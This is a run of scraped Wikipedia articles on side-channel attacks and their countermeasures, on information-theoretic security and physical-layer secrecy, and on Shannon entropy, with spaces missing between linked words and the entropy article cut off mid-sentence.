Incomputer security, aside-channel attackis any attack based on extra information that can be gathered because of the fundamental way acomputer protocoloralgorithmisimplemented, rather than flaws in the design of the protocol or algorithm itself (e.g. flaws found in acryptanalysisof acryptographic algorithm) or minor, but potentially devastating,mistakes or oversights in the implementation. (Cryptanalysis also includes searching for side-channel attacks.) Timing information, power consumption,electromagneticleaks, andsoundare examples of extra information which could be exploited to facilitate side-channel attacks. Some side-channel attacks require technical knowledge of the internal operation of the system, although others such asdifferential power analysisare effective asblack-boxattacks. The rise ofWeb 2.0applications andsoftware-as-a-servicehas also significantly raised the possibility of side-channel attacks on the web, even when transmissions between a web browser and server are encrypted (e.g. throughHTTPSorWiFiencryption), according to researchers fromMicrosoft ResearchandIndiana University.[1] Attempts to break a cryptosystem by deceiving or coercing people with legitimate access are not typically considered side-channel attacks: seesocial engineeringandrubber-hose cryptanalysis. General classes of side-channel attack include: In all cases, the underlying principle is that physical effects caused by the operation of acryptosystem(on the side) can provide useful extra information about secrets in the system, for example, thecryptographic key, partial state information, full or partialplaintextsand so forth. The term cryptophthora (secret degradation) is sometimes used to express the degradation of secret key material resulting from side-channel leakage. Acache side-channel attackworks by monitoring security critical operations such asAEST-table entry[2][3][4]or modular exponentiation or multiplication or memory accesses.[5]The attacker then is able to recover the secret key depending on the accesses made (or not made) by the victim, deducing the encryption key. Also, unlike some of the other side-channel attacks, this method does not create a fault in the ongoing cryptographic operation and is invisible to the victim. In 2017, twoCPUvulnerabilities (dubbedMeltdownandSpectre) were discovered, which can use a cache-based side channel to allow an attacker to leak memory contents of other processes and the operating system itself. Atiming attackwatches data movement into and out of theCPUor memory on the hardware running the cryptosystem or algorithm. Simply by observing variations in how long it takes to perform cryptographic operations, it might be possible to determine the entire secret key. Such attacks involve statistical analysis of timing measurements and have been demonstrated across networks.[6] Apower-analysisattack can provide even more detailed information by observing the power consumption of a hardware device such as CPU or cryptographic circuit. These attacks are roughly categorized into simple power analysis (SPA) and differential power analysis (DPA). One example is Collide+Power, which affects nearly all CPUs.[7][8][9]Other examples usemachine learningapproaches.[10] Fluctuations in current also generateradio waves, enabling attacks that analyze measurements of electromagnetic (EM) emanations. These attacks typically involve similar statistical techniques as power-analysis attacks. Adeep-learning-based side-channel attack,[11][12][13]using the power and EM information across multiple devices has been demonstrated with the potential to break the secret key of a different but identical device in as low as a single trace. Historical analogues to modern side-channel attacks are known. A recently declassifiedNSAdocument reveals that as far back as 1943, an engineer withBell telephoneobserved decipherable spikes on an oscilloscope associated with the decrypted output of a certain encrypting teletype.[14]According to formerMI5officerPeter Wright, the British Security Service analyzed emissions from French cipher equipment in the 1960s.[15]In the 1980s,Sovieteavesdroppers were suspected of having plantedbugsinside IBMSelectrictypewriters to monitor the electrical noise generated as the type ball rotated and pitched to strike the paper; the characteristics of those signals could determine which key was pressed.[16] Power consumption of devices causes heating, which is offset by cooling effects. Temperature changes create thermally induced mechanical stress. This stress can create low levelacousticemissions from operating CPUs (about 10 kHz in some cases). Recent research byShamiret al. has suggested that information about the operation of cryptosystems and algorithms can be obtained in this way as well. This is anacoustic cryptanalysis attack. If the surface of the CPU chip, or in some cases the CPU package, can be observed,infraredimages can also provide information about the code being executed on the CPU, known as athermal-imaging attack.[citation needed] Anoptical side-channel attackexamples include gleaning information from the hard disk activity indicator[17]to reading a small number of photons emitted by transistors as they change state.[18] Allocation-based side channelsalso exist and refer to the information that leaks from the allocation (as opposed to the use) of a resource such as network bandwidth to clients that are concurrently requesting the contended resource.[19] Because side-channel attacks rely on the relationship between information emitted (leaked) through a side channel and the secret data, countermeasures fall into two main categories: (1) eliminate or reduce the release of such information and (2) eliminate the relationship between the leaked information and the secret data, that is, make the leaked information unrelated, or ratheruncorrelated, to the secret data, typically through some form of randomization of the ciphertext that transforms the data in a way that can be undone after the cryptographic operation (e.g., decryption) is completed. Under the first category, displays with special shielding to lessen electromagnetic emissions, reducing susceptibility toTEMPESTattacks, are now commercially available. Power line conditioning and filtering can help deter power-monitoring attacks, although such measures must be used cautiously, since even very small correlations can remain and compromise security. Physical enclosures can reduce the risk of surreptitious installation of microphones (to counter acoustic attacks) and other micro-monitoring devices (against CPU power-draw or thermal-imaging attacks). Another countermeasure (still in the first category) is to jam the emitted channel with noise. For instance, a random delay can be added to deter timing attacks, although adversaries can compensate for these delays by averaging multiple measurements (or, more generally, using more measurements in the analysis). When the amount of noise in the side channel increases, the adversary needs to collect more measurements. Another countermeasure under the first category is to use security analysis software to identify certain classes of side-channel attacks that can be found during the design stages of the underlying hardware itself. Timing attacks and cache attacks are both identifiable through certain commercially available security analysis software platforms, which allow for testing to identify the attack vulnerability itself, as well as the effectiveness of the architectural change to circumvent the vulnerability. The most comprehensive method to employ this countermeasure is to create a Secure Development Lifecycle for hardware, which includes utilizing all available security analysis platforms at their respective stages of the hardware development lifecycle.[20] In the case of timing attacks against targets whose computation times are quantized into discrete clock cycle counts, an effective countermeasure against is to design the software to be isochronous, that is to run in an exactly constant amount of time, independently of secret values. This makes timing attacks impossible.[21]Such countermeasures can be difficult to implement in practice, since even individual instructions can have variable timing on some CPUs. One partial countermeasure against simple power attacks, but not differential power-analysis attacks, is to design the software so that it is "PC-secure" in the "program counter security model". In a PC-secure program, the execution path does not depend on secret values. In other words, all conditional branches depend only on public information. (This is a more restrictive condition than isochronous code, but a less restrictive condition than branch-free code.) Even though multiply operations draw more power thanNOPon practically all CPUs, using a constant execution path prevents such operation-dependent power differences (differences in power from choosing one branch over another) from leaking any secret information.[21]On architectures where the instruction execution time is not data-dependent, a PC-secure program is also immune to timing attacks.[22][23] Another way in which code can be non-isochronous is that modern CPUs have a memory cache: accessing infrequently used information incurs a large timing penalty, revealing some information about the frequency of use of memory blocks. Cryptographic code designed to resist cache attacks attempts to use memory in only a predictable fashion (like accessing only the input, outputs and program data, and doing so according to a fixed pattern). For example, data-dependenttable lookupsmust be avoided because the cache could reveal which part of the lookup table was accessed. Other partial countermeasures attempt to reduce the amount of information leaked from data-dependent power differences. Some operations use power that is correlated to the number of 1 bits in a secret value. Using aconstant-weight code(such as usingFredkin gatesor dual-rail encoding) can reduce the leakage of information about theHamming weightof the secret value, although exploitable correlations are likely to remain unless the balancing is perfect. This "balanced design" can be approximated in software by manipulating both the data and its complement together.[21] Several "secure CPUs" have been built asasynchronous CPUs; they have no global timing reference. While these CPUs were intended to make timing and power attacks more difficult,[21]subsequent research found that timing variations in asynchronous circuits are harder to remove.[24] A typical example of the second category (decorrelation) is a technique known asblinding. In the case ofRSAdecryption with secret exponentd{\displaystyle d}and corresponding encryption exponente{\displaystyle e}and modulusm{\displaystyle m}, the technique applies as follows (for simplicity, the modular reduction bymis omitted in the formulas): before decrypting, that is, before computing the result ofyd{\displaystyle y^{d}}for a given ciphertexty{\displaystyle y}, the system picks a random numberr{\displaystyle r}and encrypts it with public exponente{\displaystyle e}to obtainre{\displaystyle r^{e}}. Then, the decryption is done ony⋅re{\displaystyle y\cdot r^{e}}to obtain(y⋅re)d=yd⋅re⋅d=yd⋅r{\displaystyle {(y\cdot r^{e})}^{d}=y^{d}\cdot r^{e\cdot d}=y^{d}\cdot r}. Since the decrypting system choser{\displaystyle r}, it can compute its inverse modulom{\displaystyle m}to cancel out the factorr{\displaystyle r}in the result and obtainyd{\displaystyle y^{d}}, the actual result of the decryption. For attacks that require collecting side-channel information from operations with datacontrolled by the attacker, blinding is an effective countermeasure, since the actual operation is executed on a randomized version of the data, over which the attacker has no control or even knowledge. A more general countermeasure (in that it is effective against all side-channel attacks) is the masking countermeasure. The principle of masking is to avoid manipulating any sensitive valuey{\displaystyle y}directly, but rather manipulate a sharing of it: a set of variables (called "shares")y1,...,yd{\displaystyle y_{1},...,y_{d}}such thaty=y1⊕...⊕yd{\displaystyle y=y_{1}\oplus ...\oplus y_{d}}(where⊕{\displaystyle \oplus }is theXORoperation). An attacker must recover all the values of the shares to get any meaningful information.[25] Recently, white-box modeling was utilized to develop a low-overhead generic circuit-level countermeasure[26]against both EM as well as power side-channel attacks. To minimize the effects of the higher-level metal layers in an IC acting as more efficient antennas,[27]the idea is to embed the crypto core with a signature suppression circuit,[28][29]routed locally within the lower-level metal layers, leading towards both power and EM side-channel attack immunity.
https://en.wikipedia.org/wiki/Side-channel_attack
Acryptosystemis considered to haveinformation-theoretic security(also calledunconditional security[1]) if the system is secure againstadversarieswith unlimited computing resources and time. In contrast, a system which depends on the computational cost ofcryptanalysisto be secure (and thus can be broken by an attack with unlimited computation) is calledcomputationally secureor conditionally secure.[2] An encryption protocol with information-theoretic security is impossible to break even with infinite computational power. Protocols proven to be information-theoretically secure are resistant to future developments in computing. The concept of information-theoretically secure communication was introduced in 1949 by American mathematicianClaude Shannon, one of the founders of classicalinformation theory, who used it to prove theone-time padsystem was secure.[3]Information-theoretically secure cryptosystems have been used for the most sensitive governmental communications, such asdiplomatic cablesand high-level military communications.[citation needed] There are a variety of cryptographic tasks for which information-theoretic security is a meaningful and useful requirement. A few of these are: Algorithms which are computationally or conditionally secure (i.e., they are not information-theoretically secure) are dependent on resource limits. For example,RSArelies on the assertion that factoring large numbers is hard. A weaker notion of security, defined byAaron D. Wyner, established a now-flourishing area of research that is known as physical layer encryption.[4]It exploits the physicalwirelesschannel for its security by communications, signal processing, and coding techniques. The security isprovable,unbreakable, and quantifiable (in bits/second/hertz). Wyner's initial physical layer encryption work in the 1970s posed the Alice–Bob–Eve problem in which Alice wants to send a message to Bob without Eve decoding it. If the channel from Alice to Bob is statistically better than the channel from Alice to Eve, it had been shown that secure communication is possible.[5]That is intuitive, but Wyner measured the secrecy in information theoretic terms defining secrecy capacity, which essentially is the rate at which Alice can transmit secret information to Bob. Shortly afterward,Imre Csiszárand Körner showed that secret communication was possible even if Eve had a statistically better channel to Alice than Bob did.[6]The basic idea of the information theoretic approach to securely transmit confidential messages (without using an encryption key) to a legitimate receiver is to use the inherent randomness of the physical medium (including noises and channel fluctuations due to fading) and exploit the difference between the channel to a legitimate receiver and the channel to an eavesdropper to benefit the legitimate receiver.[7]More recent theoretical results are concerned with determining the secrecy capacity and optimal power allocation in broadcast fading channels.[8][9]There are caveats, as many capacities are not computable unless the assumption is made that Alice knows the channel to Eve. If that were known, Alice could simply place a null in Eve's direction. Secrecy capacity forMIMOand multiplecolludingeavesdroppers is more recent and ongoing work,[10][11]and such results still make the non-useful assumption about eavesdropper channel state information knowledge. Still other work is less theoretical by attempting to compare implementable schemes. One physical layer encryption scheme is to broadcast artificial noise in all directions except that of Bob's channel, which basically jams Eve. One paper by Negi and Goel details its implementation, and Khisti and Wornell computed the secrecy capacity when only statistics about Eve's channel are known.[12][13] Parallel to that work in the information theory community is work in the antenna community, which has been termed near-field direct antenna modulation or directional modulation.[14]It has been shown that by using aparasitic array, the transmitted modulation in different directions could be controlled independently.[15]Secrecy could be realized by making the modulations in undesired directions difficult to decode. Directional modulation data transmission was experimentally demonstrated using aphased array.[16]Others have demonstrated directional modulation withswitched arraysandphase-conjugating lenses.[17][18][19] That type of directional modulation is really a subset of Negi and Goel's additive artificial noise encryption scheme. Another scheme usingpattern-reconfigurabletransmit antennas for Alice called reconfigurablemultiplicative noise(RMN) complements additive artificial noise.[20]The two work well together in channel simulations in which nothing is assumed known to Alice or Bob about the eavesdroppers. The different works mentioned in the previous part employ, in one way or another, the randomness present in the wireless channel to transmit information-theoretically secure messages. Conversely, we could analyze how much secrecy one can extract from the randomness itself in the form of asecret key. That is the goal ofsecret key agreement. In this line of work, started by Maurer[21]and Ahlswede and Csiszár,[22]the basic system model removes any restriction on the communication schemes and assumes that the legitimate users can communicate over a two-way, public, noiseless, and authenticated channel at no cost. This model has been subsequently extended to account for multiple users[23]and a noisy channel[24]among others.
https://en.wikipedia.org/wiki/Perfect_secrecy
Ininformation theory, theentropyof arandom variablequantifies the average level of uncertainty or information associated with the variable's potential states or possible outcomes. This measures the expected amount of information needed to describe the state of the variable, considering the distribution of probabilities across all potential states. Given a discrete random variableX{\displaystyle X}, which may be any memberx{\displaystyle x}within the setX{\displaystyle {\mathcal {X}}}and is distributed according top:X→[0,1]{\displaystyle p\colon {\mathcal {X}}\to [0,1]}, the entropy isH(X):=−∑x∈Xp(x)log⁡p(x),{\displaystyle \mathrm {H} (X):=-\sum _{x\in {\mathcal {X}}}p(x)\log p(x),}whereΣ{\displaystyle \Sigma }denotes the sum over the variable's possible values.[Note 1]The choice of base forlog{\displaystyle \log }, thelogarithm, varies for different applications. Base 2 gives the unit ofbits(or "shannons"), while baseegives "natural units"nat, and base 10 gives units of "dits", "bans", or "hartleys". An equivalent definition of entropy is theexpected valueof theself-informationof a variable.[1] The concept of information entropy was introduced byClaude Shannonin his 1948 paper "A Mathematical Theory of Communication",[2][3]and is also referred to asShannon entropy. Shannon's theory defines adata communicationsystem composed of three elements: a source of data, acommunication channel, and a receiver. The "fundamental problem of communication" – as expressed by Shannon – is for the receiver to be able to identify what data was generated by the source, based on the signal it receives through the channel.[2][3]Shannon considered various ways to encode, compress, and transmit messages from a data source, and proved in hissource coding theoremthat the entropy represents an absolute mathematical limit on how well data from the source can belosslesslycompressed onto a perfectly noiseless channel. Shannon strengthened this result considerably for noisy channels in hisnoisy-channel coding theorem. Entropy in information theory is directly analogous to theentropyinstatistical thermodynamics. The analogy results when the values of the random variable designate energies of microstates, so Gibbs's formula for the entropy is formally identical to Shannon's formula. Entropy has relevance to other areas of mathematics such ascombinatoricsandmachine learning. The definition can be derived from a set ofaxiomsestablishing that entropy should be a measure of how informative the average outcome of a variable is. For a continuous random variable,differential entropyis analogous to entropy. The definitionE[−log⁡p(X)]{\displaystyle \mathbb {E} [-\log p(X)]}generalizes the above. The core idea of information theory is that the "informational value" of a communicated message depends on the degree to which the content of the message is surprising. If a highly likely event occurs, the message carries very little information. On the other hand, if a highly unlikely event occurs, the message is much more informative. For instance, the knowledge that some particular numberwill notbe the winning number of a lottery provides very little information, because any particular chosen number will almost certainly not win. However, knowledge that a particular numberwillwin a lottery has high informational value because it communicates the occurrence of a very low probability event. Theinformation content,also called thesurprisalorself-information,of an eventE{\displaystyle E}is a function that increases as the probabilityp(E){\displaystyle p(E)}of an event decreases. Whenp(E){\displaystyle p(E)}is close to 1, the surprisal of the event is low, but ifp(E){\displaystyle p(E)}is close to 0, the surprisal of the event is high. This relationship is described by the functionlog⁡(1p(E)),{\displaystyle \log \left({\frac {1}{p(E)}}\right),}wherelog{\displaystyle \log }is thelogarithm, which gives 0 surprise when the probability of the event is 1.[4]In fact,logis the only function that satisfies а specific set of conditions defined in section§ Characterization. Hence, we can define the information, or surprisal, of an eventE{\displaystyle E}byI(E)=−log⁡(p(E)),{\displaystyle I(E)=-\log(p(E)),}or equivalently,I(E)=log⁡(1p(E)).{\displaystyle I(E)=\log \left({\frac {1}{p(E)}}\right).} Entropy measures the expected (i.e., average) amount of information conveyed by identifying the outcome of a random trial.[5]: 67This implies that rolling a die has higher entropy than tossing a coin because each outcome of a die toss has smaller probability (p=1/6{\displaystyle p=1/6}) than each outcome of a coin toss (p=1/2{\displaystyle p=1/2}). Consider a coin with probabilitypof landing on heads and probability1 −pof landing on tails. The maximum surprise is whenp= 1/2, for which one outcome is not expected over the other. In this case a coin flip has an entropy of onebit(similarly, onetritwith equiprobable values containslog2⁡3{\displaystyle \log _{2}3}(about 1.58496) bits of information because it can have one of three values). The minimum surprise is whenp= 0(impossibility) orp= 1(certainty) and the entropy is zero bits. When the entropy is zero, sometimes referred to as unity[Note 2], there is no uncertainty at all – no freedom of choice – noinformation.[6]Other values ofpgive entropies between zero and one bits. Information theory is useful to calculate the smallest amount of information required to convey a message, as indata compression. For example, consider the transmission of sequences comprising the 4 characters 'A', 'B', 'C', and 'D' over a binary channel. If all 4 letters are equally likely (25%), one cannot do better than using two bits to encode each letter. 'A' might code as '00', 'B' as '01', 'C' as '10', and 'D' as '11'. However, if the probabilities of each letter are unequal, say 'A' occurs with 70% probability, 'B' with 26%, and 'C' and 'D' with 2% each, one could assign variable length codes. In this case, 'A' would be coded as '0', 'B' as '10', 'C' as '110', and 'D' as '111'. With this representation, 70% of the time only one bit needs to be sent, 26% of the time two bits, and only 4% of the time 3 bits. On average, fewer than 2 bits are required since the entropy is lower (owing to the high prevalence of 'A' followed by 'B' – together 96% of characters). The calculation of the sum of probability-weighted log probabilities measures and captures this effect. English text, treated as a string of characters, has fairly low entropy; i.e. it is fairly predictable. We can be fairly certain that, for example, 'e' will be far more common than 'z', that the combination 'qu' will be much more common than any other combination with a 'q' in it, and that the combination 'th' will be more common than 'z', 'q', or 'qu'. After the first few letters one can often guess the rest of the word. English text has between 0.6 and 1.3 bits of entropy per character of the message.[7]: 234 Named afterBoltzmann's Η-theorem, Shannon defined the entropyΗ(Greek capital lettereta) of adiscrete random variableX{\textstyle X}, which takes values in the setX{\displaystyle {\mathcal {X}}}and is distributed according top:X→[0,1]{\displaystyle p:{\mathcal {X}}\to [0,1]}such thatp(x):=P[X=x]{\displaystyle p(x):=\mathbb {P} [X=x]}: H(X)=E[I⁡(X)]=E[−log⁡p(X)].{\displaystyle \mathrm {H} (X)=\mathbb {E} [\operatorname {I} (X)]=\mathbb {E} [-\log p(X)].} HereE{\displaystyle \mathbb {E} }is theexpected value operator, andIis theinformation contentofX.[8]: 11[9]: 19–20I⁡(X){\displaystyle \operatorname {I} (X)}is itself a random variable. The entropy can explicitly be written as:H(X)=−∑x∈Xp(x)logb⁡p(x),{\displaystyle \mathrm {H} (X)=-\sum _{x\in {\mathcal {X}}}p(x)\log _{b}p(x),}wherebis thebase of the logarithmused. Common values ofbare 2,Euler's numbere, and 10, and the corresponding units of entropy are thebitsforb= 2,natsforb=e, andbansforb= 10.[10] In the case ofp(x)=0{\displaystyle p(x)=0}for somex∈X{\displaystyle x\in {\mathcal {X}}}, the value of the corresponding summand0 logb(0)is taken to be0, which is consistent with thelimit:[11]: 13limp→0+plog⁡(p)=0.{\displaystyle \lim _{p\to 0^{+}}p\log(p)=0.} One may also define theconditional entropyof two variablesX{\displaystyle X}andY{\displaystyle Y}taking values from setsX{\displaystyle {\mathcal {X}}}andY{\displaystyle {\mathcal {Y}}}respectively, as:[11]: 16H(X|Y)=−∑x,y∈X×YpX,Y(x,y)log⁡pX,Y(x,y)pY(y),{\displaystyle \mathrm {H} (X|Y)=-\sum _{x,y\in {\mathcal {X}}\times {\mathcal {Y}}}p_{X,Y}(x,y)\log {\frac {p_{X,Y}(x,y)}{p_{Y}(y)}},}wherepX,Y(x,y):=P[X=x,Y=y]{\displaystyle p_{X,Y}(x,y):=\mathbb {P} [X=x,Y=y]}andpY(y)=P[Y=y]{\displaystyle p_{Y}(y)=\mathbb {P} [Y=y]}. This quantity should be understood as the remaining randomness in the random variableX{\displaystyle X}given the random variableY{\displaystyle Y}. Entropy can be formally defined in the language ofmeasure theoryas follows:[12]Let(X,Σ,μ){\displaystyle (X,\Sigma ,\mu )}be aprobability space. LetA∈Σ{\displaystyle A\in \Sigma }be anevent. ThesurprisalofA{\displaystyle A}isσμ(A)=−ln⁡μ(A).{\displaystyle \sigma _{\mu }(A)=-\ln \mu (A).} Theexpectedsurprisal ofA{\displaystyle A}ishμ(A)=μ(A)σμ(A).{\displaystyle h_{\mu }(A)=\mu (A)\sigma _{\mu }(A).} Aμ{\displaystyle \mu }-almostpartitionis aset familyP⊆P(X){\displaystyle P\subseteq {\mathcal {P}}(X)}such thatμ(∪⁡P)=1{\displaystyle \mu (\mathop {\cup } P)=1}andμ(A∩B)=0{\displaystyle \mu (A\cap B)=0}for all distinctA,B∈P{\displaystyle A,B\in P}. (This is a relaxation of the usual conditions for a partition.) The entropy ofP{\displaystyle P}isHμ(P)=∑A∈Phμ(A).{\displaystyle \mathrm {H} _{\mu }(P)=\sum _{A\in P}h_{\mu }(A).} LetM{\displaystyle M}be asigma-algebraonX{\displaystyle X}. The entropy ofM{\displaystyle M}isHμ(M)=supP⊆MHμ(P).{\displaystyle \mathrm {H} _{\mu }(M)=\sup _{P\subseteq M}\mathrm {H} _{\mu }(P).}Finally, the entropy of the probability space isHμ(Σ){\displaystyle \mathrm {H} _{\mu }(\Sigma )}, that is, the entropy with respect toμ{\displaystyle \mu }of the sigma-algebra ofallmeasurable subsets ofX{\displaystyle X}. Recent studies on layered dynamical systems have introduced the concept of symbolic conditional entropy, further extending classical entropy measures to more abstract informational structures.[13] Consider tossing a coin with known, not necessarily fair, probabilities of coming up heads or tails; this can be modeled as aBernoulli process. The entropy of the unknown result of the next toss of the coin is maximized if the coin is fair (that is, if heads and tails both have equal probability 1/2). This is the situation of maximum uncertainty as it is most difficult to predict the outcome of the next toss; the result of each toss of the coin delivers one full bit of information. This is becauseH(X)=−∑i=1np(xi)logb⁡p(xi)=−∑i=1212log2⁡12=−∑i=1212⋅(−1)=1.{\displaystyle {\begin{aligned}\mathrm {H} (X)&=-\sum _{i=1}^{n}{p(x_{i})\log _{b}p(x_{i})}\\&=-\sum _{i=1}^{2}{{\frac {1}{2}}\log _{2}{\frac {1}{2}}}\\&=-\sum _{i=1}^{2}{{\frac {1}{2}}\cdot (-1)}=1.\end{aligned}}} However, if we know the coin is not fair, but comes up heads or tails with probabilitiespandq, wherep≠q, then there is less uncertainty. Every time it is tossed, one side is more likely to come up than the other. The reduced uncertainty is quantified in a lower entropy: on average each toss of the coin delivers less than one full bit of information. For example, ifp= 0.7, thenH(X)=−plog2⁡p−qlog2⁡q=−0.7log2⁡(0.7)−0.3log2⁡(0.3)≈−0.7⋅(−0.515)−0.3⋅(−1.737)=0.8816<1.{\displaystyle {\begin{aligned}\mathrm {H} (X)&=-p\log _{2}p-q\log _{2}q\\[1ex]&=-0.7\log _{2}(0.7)-0.3\log _{2}(0.3)\\[1ex]&\approx -0.7\cdot (-0.515)-0.3\cdot (-1.737)\\[1ex]&=0.8816<1.\end{aligned}}} Uniform probability yields maximum uncertainty and therefore maximum entropy. Entropy, then, can only decrease from the value associated with uniform probability. The extreme case is that of a double-headed coin that never comes up tails, or a double-tailed coin that never results in a head. Then there is no uncertainty. The entropy is zero: each toss of the coin delivers no new information as the outcome of each coin toss is always certain.[11]: 14–15 To understand the meaning of−Σpilog(pi), first define an information functionIin terms of an eventiwith probabilitypi. The amount of information acquired due to the observation of eventifollows from Shannon's solution of the fundamental properties ofinformation:[14] Given two independent events, if the first event can yield one ofnequiprobableoutcomes and another has one ofmequiprobable outcomes then there aremnequiprobable outcomes of the joint event. This means that iflog2(n)bits are needed to encode the first value andlog2(m)to encode the second, one needslog2(mn) = log2(m) + log2(n)to encode both. Shannon discovered that a suitable choice ofI{\displaystyle \operatorname {I} }is given by:[15]I⁡(p)=log⁡(1p)=−log⁡(p).{\displaystyle \operatorname {I} (p)=\log \left({\tfrac {1}{p}}\right)=-\log(p).} In fact, the only possible values ofI{\displaystyle \operatorname {I} }areI⁡(u)=klog⁡u{\displaystyle \operatorname {I} (u)=k\log u}fork<0{\displaystyle k<0}. Additionally, choosing a value forkis equivalent to choosing a valuex>1{\displaystyle x>1}fork=−1/log⁡x{\displaystyle k=-1/\log x}, so thatxcorresponds to thebase for the logarithm. Thus, entropy ischaracterizedby the above four properties. I⁡(p1p2)=I⁡(p1)+I⁡(p2)Starting from property 3p2I′⁡(p1p2)=I′⁡(p1)taking the derivative w.r.tp1I′⁡(p1p2)+p1p2I″⁡(p1p2)=0taking the derivative w.r.tp2I′⁡(u)+uI″⁡(u)=0introducingu=p1p2(uI′⁡(u))′=0combining terms into oneuI′⁡(u)−k=0integrating w.r.tu,producing constantk{\displaystyle {\begin{aligned}&\operatorname {I} (p_{1}p_{2})&=\ &\operatorname {I} (p_{1})+\operatorname {I} (p_{2})&&\quad {\text{Starting from property 3}}\\&p_{2}\operatorname {I} '(p_{1}p_{2})&=\ &\operatorname {I} '(p_{1})&&\quad {\text{taking the derivative w.r.t}}\ p_{1}\\&\operatorname {I} '(p_{1}p_{2})+p_{1}p_{2}\operatorname {I} ''(p_{1}p_{2})&=\ &0&&\quad {\text{taking the derivative w.r.t}}\ p_{2}\\&\operatorname {I} '(u)+u\operatorname {I} ''(u)&=\ &0&&\quad {\text{introducing}}\,u=p_{1}p_{2}\\&(u\operatorname {I} '(u))'&=\ &0&&\quad {\text{combining terms into one}}\ \\&u\operatorname {I} '(u)-k&=\ &0&&\quad {\text{integrating w.r.t}}\ u,{\text{producing constant}}\,k\\\end{aligned}}} Thisdifferential equationleads to the solutionI⁡(u)=klog⁡u+c{\displaystyle \operatorname {I} (u)=k\log u+c}for somek,c∈R{\displaystyle k,c\in \mathbb {R} }. Property 2 givesc=0{\displaystyle c=0}. Property 1 and 2 give thatI⁡(p)≥0{\displaystyle \operatorname {I} (p)\geq 0}for allp∈[0,1]{\displaystyle p\in [0,1]}, so thatk<0{\displaystyle k<0}. The differentunits of information(bitsfor thebinary logarithmlog2,natsfor thenatural logarithmln,bansfor thedecimal logarithmlog10and so on) areconstant multiplesof each other. For instance, in case of a fair coin toss, heads provideslog2(2) = 1bit of information, which is approximately 0.693 nats or 0.301 decimal digits. Because of additivity,ntosses providenbits of information, which is approximately0.693nnats or0.301ndecimal digits. Themeaningof the events observed (the meaning ofmessages) does not matter in the definition of entropy. Entropy only takes into account the probability of observing a specific event, so the information it encapsulates is information about the underlyingprobability distribution, not the meaning of the events themselves. Another characterization of entropy uses the following properties. We denotepi= Pr(X=xi)andΗn(p1, ...,pn) = Η(X). The rule of additivity has the following consequences: forpositive integersbiwhereb1+ ... +bk=n,Hn(1n,…,1n)=Hk(b1n,…,bkn)+∑i=1kbinHbi(1bi,…,1bi).{\displaystyle \mathrm {H} _{n}\left({\frac {1}{n}},\ldots ,{\frac {1}{n}}\right)=\mathrm {H} _{k}\left({\frac {b_{1}}{n}},\ldots ,{\frac {b_{k}}{n}}\right)+\sum _{i=1}^{k}{\frac {b_{i}}{n}}\,\mathrm {H} _{b_{i}}\left({\frac {1}{b_{i}}},\ldots ,{\frac {1}{b_{i}}}\right).} Choosingk=n,b1= ... =bn= 1this implies that the entropy of a certain outcome is zero:Η1(1) = 0. This implies that the efficiency of a source set withnsymbols can be defined simply as being equal to itsn-ary entropy. See alsoRedundancy (information theory). The characterization here imposes an additive property with respect to apartition of a set. Meanwhile, theconditional probabilityis defined in terms of a multiplicative property,P(A∣B)⋅P(B)=P(A∩B){\displaystyle P(A\mid B)\cdot P(B)=P(A\cap B)}. Observe that a logarithm mediates between these two operations. Theconditional entropyand related quantities inherit simple relation, in turn. The measure theoretic definition in the previous section defined the entropy as a sum over expected surprisalsμ(A)⋅ln⁡μ(A){\displaystyle \mu (A)\cdot \ln \mu (A)}for an extremal partition. Here the logarithm is ad hoc and the entropy is not a measure in itself. At least in the information theory of a binary string,log2{\displaystyle \log _{2}}lends itself to practical interpretations. Motivated by such relations, a plethora of related and competing quantities have been defined. For example,David Ellerman's analysis of a "logic of partitions" defines a competing measure in structuresdualto that of subsets of a universal set.[16]Information is quantified as "dits" (distinctions), a measure on partitions. "Dits" can be converted intoShannon's bits, to get the formulas for conditional entropy, and so on. Another succinct axiomatic characterization of Shannon entropy was given byAczél, Forte and Ng,[17]via the following properties: It was shown that any functionH{\displaystyle \mathrm {H} }satisfying the above properties must be a constant multiple of Shannon entropy, with a non-negative constant.[17]Compared to the previously mentioned characterizations of entropy, this characterization focuses on the properties of entropy as a function of random variables (subadditivity and additivity), rather than the properties of entropy as a function of the probability vectorp1,…,pn{\displaystyle p_{1},\ldots ,p_{n}}. It is worth noting that if we drop the "small for small probabilities" property, thenH{\displaystyle \mathrm {H} }must be a non-negative linear combination of the Shannon entropy and theHartley entropy.[17] The Shannon entropy satisfies the following properties, for some of which it is useful to interpret entropy as the expected amount of information learned (or uncertainty eliminated) by revealing the value of a random variableX: The inspiration for adopting the wordentropyin information theory came from the close resemblance between Shannon's formula and very similar known formulae fromstatistical mechanics. Instatistical thermodynamicsthe most general formula for the thermodynamicentropySof athermodynamic systemis theGibbs entropyS=−kB∑ipiln⁡pi,{\displaystyle S=-k_{\text{B}}\sum _{i}p_{i}\ln p_{i}\,,}wherekBis theBoltzmann constant, andpiis the probability of amicrostate. TheGibbs entropywas defined byJ. Willard Gibbsin 1878 after earlier work byLudwig Boltzmann(1872).[18] The Gibbs entropy translates over almost unchanged into the world ofquantum physicsto give thevon Neumann entropyintroduced byJohn von Neumannin 1927:S=−kBTr(ρln⁡ρ),{\displaystyle S=-k_{\text{B}}\,{\rm {Tr}}(\rho \ln \rho )\,,}where ρ is thedensity matrixof the quantum mechanical system and Tr is thetrace.[19] At an everyday practical level, the links between information entropy and thermodynamic entropy are not evident. Physicists and chemists are apt to be more interested inchangesin entropy as a system spontaneously evolves away from its initial conditions, in accordance with thesecond law of thermodynamics, rather than an unchanging probability distribution. As the minuteness of the Boltzmann constantkBindicates, the changes inS/kBfor even tiny amounts of substances in chemical and physical processes represent amounts of entropy that are extremely large compared to anything indata compressionorsignal processing. In classical thermodynamics, entropy is defined in terms of macroscopic measurements and makes no reference to any probability distribution, which is central to the definition of information entropy. The connection between thermodynamics and what is now known as information theory was first made by Boltzmann and expressed by hisequation: S=kBln⁡W,{\displaystyle S=k_{\text{B}}\ln W,} whereS{\displaystyle S}is the thermodynamic entropy of a particular macrostate (defined by thermodynamic parameters such as temperature, volume, energy, etc.),Wis the number of microstates (various combinations of particles in various energy states) that can yield the given macrostate, andkBis the Boltzmann constant.[20]It is assumed that each microstate is equally likely, so that the probability of a given microstate ispi= 1/W. When these probabilities are substituted into the above expression for the Gibbs entropy (or equivalentlykBtimes the Shannon entropy), Boltzmann's equation results. In information theoretic terms, the information entropy of a system is the amount of "missing" information needed to determine a microstate, given the macrostate. In the view ofJaynes(1957),[21]thermodynamic entropy, as explained bystatistical mechanics, should be seen as anapplicationof Shannon's information theory: the thermodynamic entropy is 